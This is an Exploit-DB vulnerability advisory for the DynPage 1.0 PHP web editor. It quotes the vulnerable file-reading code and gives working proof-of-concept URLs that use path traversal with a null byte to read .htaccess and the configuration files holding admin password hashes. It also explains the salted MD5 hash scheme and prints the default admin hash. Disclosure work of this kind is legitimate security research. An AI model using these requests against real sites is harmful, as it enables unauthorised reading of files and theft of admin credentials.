dynpage 1.0 - Multiple Vulnerabilities

EDB-ID:

14927

CVE:



Author:

Abysssec

Type:

webapps


Platform:

PHP

Date:

2010-09-07


'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ < 
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

 http://www.exploit-db.com/moaub-7-dynpage-multiple-remote-vulnerabilities/
'''

- Title  : DynPage Multiple Remote Vulnerabilities.
- Affected Version : <= v1.0
- Vendor  Site   : http://www.dynpage.net
 
- Discovery : Abysssec.com
 
 
- Description :
===============
DynPage allows you to edit Websites online and make pieces of contents editable with a comfortable editor.
DynPage implements the CKeditor - one of the best Internet editors. 
The integration of content into the HTML pages can be done with Ajax/Javascript or PHP - so you can also handle cross domain sites. 
DynPage is written in PHP and does not require MySQL database. It's easy to install and to configurate.

- Vulnerabilities:
==================
1)Local File Disclosure:
---------------------
	+Code:
	/content/dynpage_load.php #[line(20-28)]:

	$filename = $_GET["file"];
	if (!is_dir ($filename) && file_exists ($filename)) {
	
		$bytes = filesize ($filename);
		$fh = fopen($filename, 'r');
		print (fread ($fh, $bytes));
		fclose ($fh);

	}


	+POC: 
	     http://www.Site.com/dynpage/content/dynpage_load.php?file=../.htaccess%00


2)Admin hash Disclosure:
---------------------------------
	The Admin password hash format:	MD5('admin:'+$password)
	then password's salt is "admin:".

	2-a)Default password is admin,that stored in config_global.inc.php(line 41-42 )
			// Default login admin
			"default_login_hash" => "d2abaa37a7c3db1137d385e1d8c15fd2",
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../config_global.inc.php%00

	2-b)the hash  password  stored as SESSION in /conf/init.inc.php.
		<?php
			// This file is generated automatically!
			// No not modify manually!
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['login_hash']="2d08086927f4d87a31154aaf0ba2e067";
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com";
		?>
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00